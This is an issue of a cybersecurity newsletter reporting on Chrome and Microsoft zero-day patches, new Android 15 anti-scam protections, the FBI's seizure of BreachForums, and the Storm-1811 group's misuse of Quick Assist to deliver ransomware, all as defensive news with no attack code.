New advanced Android features protect from scams

May 17 2024

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter thatโ€™s got that Friday feeling! ๐ŸŽ‰๐ŸŽ‰๐ŸŽ‰

Itโ€™s Friday, folks, which can only mean one thingโ€ฆ Itโ€™s time for our weekly segment!

It goes by many names. Patch of the Week, Tweak of the week. Okay, thatโ€™s it.

Congrats, the cybercriminals are no matchโ€ฆ for your patch! ๐Ÿฉน๐Ÿฉน๐Ÿฉน

๐Ÿšจ Google Chrome Users: Update Now to Patch New Zero-Day! ๐Ÿ”’

Google has rolled out crucial fixes for nine security issues in Chrome, including a zero-day vulnerability actively exploited in the wild! ๐Ÿ›ก๏ธ CVE-2024-4947, a type confusion bug in the V8 JavaScript and WebAssembly engine, reported by Kaspersky researchers, could let attackers execute arbitrary code! ๐Ÿ˜ฑ This marks the third zero-day patch this week, after CVE-2024-4671 and CVE-2024-4761. ๐Ÿ› ๏ธ To stay safe, update to Chrome version 125.0.6422.60/.61 for Windows and macOS, and 125.0.6422.60 for Linux. Users of Chromium-based browsers like Microsoft Edge, Brave, Opera, and Vivaldi should also update ASAP! ๐Ÿ”„

๐Ÿšจ Microsoft Issues Vital Security Patches: Update Now! ๐Ÿ”’

Microsoft has rolled out fixes for 61 security flaws in its May 2024 Patch Tuesday update, including two zero-days actively exploited in the wild! ๐Ÿ›ก๏ธ Of these, one is Critical, 59 are Important, and one is Moderate. Additionally, 30 vulnerabilities in the Chromium-based Edge browser were addressed, including two zero-days (CVE-2024-4671 and CVE-2024-4761).The zero-days fixed are:

  • CVE-2024-30040 (CVSS 8.8): MSHTML Platform Security Feature Bypass

  • CVE-2024-30051 (CVSS 7.8): Desktop Window Manager (DWM) Core Library Elevation of Privilege

Exploitation of these flaws could allow attackers to execute arbitrary code and gain SYSTEM privileges! ๐Ÿ˜ฑ Attackers can exploit CVE-2024-30040 by tricking users into opening a malicious document, while CVE-2024-30051 allows threat actors to elevate privileges with SYSTEM access.Microsoft urges users to update immediately to mitigate these threats. Federal agencies must apply the latest fixes by June 4, 2024. ๐Ÿ—“๏ธThis update also addresses critical remote code execution bugs in Windows Mobile Broadband Driver and Windows Routing and Remote Access Service (RRAS), among others. Stay secure by prioritising updates and reviewing your security posture.

Now, on to todayโ€™s hottest cybersecurity news stories:

  • ๐Ÿ“ฑ Android users rejoice! New advanced features protect from scams ๐Ÿ›ก๏ธ

  • ๐Ÿ‘ฎ FBI shuts down BreachForums platform for second time in a year ๐Ÿ“…

  • ๐Ÿ‘จโ€๐Ÿ’ป Hackers exploit Microsoftโ€™s Quick Assist feature for ransomware ๐Ÿ’ฐ

These arenโ€™t the Androids youโ€™re looking for ๐Ÿ˜ตโ€๐Ÿ’ซ

๐Ÿ“ฑ Android 15 Introduces Robust Security Features to Combat Malware ๐Ÿ›ก๏ธ๐Ÿ”’

Enhanced Play Integrity APIGoogle is rolling out a suite of new features in Android 15 aimed at preventing malicious apps from capturing sensitive data. The updated Play Integrity API allows third-party developers to secure their apps against malware.

๐Ÿ” Key Updates

Developers can check for other apps that might be capturing the screen, creating overlays, or controlling the device. This is crucial for hiding sensitive information and protecting users from scams.The Play Integrity API can verify if Google Play Protect is active and if the device is free of known malware before performing sensitive actions.

๐Ÿ› ๏ธ Expanded Restricted SettingsWith Android 15, restricted settings are getting stronger. Now, when installing apps via sideloading from web browsers, messaging apps, or file managers, user approval is required before enabling permissions.

โš ๏ธ Proactive Fraud Detection

Developers can opt-in to receive recent device activity to detect if a device is making too many integrity checks, which could indicate an attack. This feature targets Android banking trojans known to abuse accessibility services for overlay attacks and disabling security mechanisms.

๐Ÿ” Continuous Improvement

Google is piloting enhanced fraud protection in regions where malicious sideloaded apps are prevalent, like Singapore and Thailand. This protection blocks instals from sources that use permissions commonly abused for financial fraud.

๐Ÿ“ก Cellular Security Enhancements

Google is also enhancing cellular security by alerting users if their network connection is unencrypted or if a fake cellular base station is recording their location.

๐Ÿ” Tightened Screen Sharing ControlsAndroid 15 will automatically hide notification content during screen sharing to prevent the display of one-time passwords (OTPs) sent via SMS, closing a common attack vector for fraud and spyware.

๐Ÿง  Live Threat Detection

Google Play Protect's on-device AI capabilities are getting an upgrade with live threat detection. This feature uses the Private Compute Core (PCC) infrastructure to flag anomalous patterns on the device and analyse behavioural signals related to the use of sensitive permissions.

๐Ÿ” Real-Time Scanning

The new live threat detection builds on recently added real-time scanning capabilities to combat novel malicious apps and spot emerging threats, ensuring users are better protected against the latest cyber threats.

๐Ÿ›ก๏ธ Staying Ahead of Threats

"We're continuously working on improving and evolving our protections to stay ahead of bad actors," said Dave Kleidermacher, vice president of engineering for Android security and privacy. "With these new features, we aim to provide users with the highest level of security and privacy."

Google is collaborating with original equipment manufacturers (OEMs) to roll out these features to users over the next couple of years, ensuring comprehensive protection across the Android ecosystem.4o

My Favorite Newsletter: Stay ahead on the business of AIย 

Have you heard of Prompts Daily newsletter? I recently came across it and absolutely love it.

AI news, insights, tools and workflows. If you want to keep up with the business of AI, you need to be subscribed to the newsletter (itโ€™s free).

Read by executives from industry-leading companies like Google, Hubspot, Meta, and more.

Want to receive daily intel on the latest in business/AI?

In just ONE click, you can quickly sign up to the free Prompts Daily newsletter.

Thatโ€™ll Breach โ€˜em ๐Ÿ˜

๐Ÿ”’ BreachForums Seized Again by Authorities! ๐Ÿš”๐ŸŽฏ

Law Enforcement StrikesLaw enforcement agencies have seized control of the notorious BreachForums platform, an online marketplace for stolen data, for the second time in a year.

๐Ÿ›‘ Seizure Notice

The BreachForums website ("breachforums[.]st") now displays a seizure banner from the U.S. Federal Bureau of Investigation (FBI).

๐ŸŒ Global Effort

This operation was a collaborative effort involving authorities from Australia, Iceland, New Zealand, Switzerland, the U.K., the U.S., and Ukraine.

๐Ÿ“ฑ Telegram Takeover

The FBI has also taken control of the Telegram channel operated by Baphomet, the administrator who took over after Conor Brian Fitzpatrick (aka pompompurin) was arrested in March last year.

๐Ÿ“œ Official Message

A message on the seized Telegram channel reads: "This Telegram chat is under the control of the FBI. The BreachForums website has been taken down by the FBI and DOJ with assistance from international partners."

๐Ÿ” Investigation Ongoing

Authorities are reviewing the site's backend data and encourage reporting cyber criminal activity via specified FBI contact points.

๐Ÿšจ Administrator Status

It's unclear if Baphomet and co-administrator ShinyHunters have been arrested, but the seizure banner shows their profile pictures behind bars.

๐Ÿ”Ž Forum History

BreachForums emerged in March 2022 after the takedown of RaidForums. Despite being shut down in 2023, it resurfaced under Baphomet and ShinyHunters.

๐Ÿ’ผ Contraband Marketplace

From June 2023 to May 2024, BreachForums operated as a marketplace for cybercriminals to buy, sell, and trade illegal goods, including stolen data and hacking tools.

Hackers got us yelling: Quick, Assist! ๐Ÿ’€

โš ๏ธ Storm-1811 Exploits Quick Assist for Ransomware Attacks ๐ŸŽฏ๐Ÿ”

Microsoft's Threat Intelligence team has identified a threat actor, Storm-1811, using Quick Assist in social engineering attacks to deploy ransomware.

๐ŸŽญ Impersonation Tactics

Storm-1811, a financially motivated group known for Black Basta ransomware, uses voice phishing to trick victims into installing remote management tools like Quick Assist, followed by delivering QakBot, Cobalt Strike, and Black Basta ransomware.

๐Ÿ› ๏ธ Quick Assist Misuse

Quick Assist, a legitimate Microsoft application for remote troubleshooting, is being exploited. Attackers impersonate trusted contacts, such as Microsoft tech support, to gain access to devices.

๐Ÿ’ป Attack Method

The attackers use email bombing (link listing) to flood victims' inboxes, then call them posing as IT support to offer help. Victims are persuaded to use Quick Assist, allowing attackers to run commands and download malicious payloads.

๐Ÿ”— Chain of Attack

  1. Phishing Call: Impersonation and persuasion to use Quick Assist.

  2. Access Gained: Running commands to download malware.

  3. Ransomware Deployment: Using PsExec for spreading Black Basta ransomware.

๐Ÿ” Ongoing Response

Microsoft is investigating the misuse of Quick Assist and plans to add warnings to alert users about potential tech support scams.

๐ŸŽฏ Targeted Industries

The campaign, starting mid-April 2024, has targeted sectors like manufacturing, construction, food and beverage, and transportation, indicating a broad attack scope.

๐Ÿ”’ Top Tips

  • Block/Uninstall: Remove Quick Assist and similar tools if unused.

  • Employee Training: Educate staff to identify tech support scams.

  • ย Focus on Prevention: Emphasise security measures before ransomware deployment to mitigate threats.

๐Ÿ“ข Expert Insights

"Ransomware remains a lucrative tactic for attackers due to its low entry barrier and high impact," said Robert Knapp, Rapid7. Organisations should enhance security measures and focus on early attack stages to reduce risks.

๐Ÿ”— Collaborative Effort

Microsoft describes Black Basta as a "closed ransomware offering" relying on a few threat actors who partner for access and malware development. Since April 2022, Black Basta has been deployed following access from QakBot and other distributors, highlighting the importance of early-stage defence.

๐Ÿ—ž๏ธ Extra, Extra! Read all about it! ๐Ÿ—ž๏ธ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • ๐Ÿ›ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐Ÿ“…

  • ๐Ÿ’ตย Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐Ÿ†“

  • ๐Ÿ“ˆย Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐Ÿ‘พ

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

Recent articles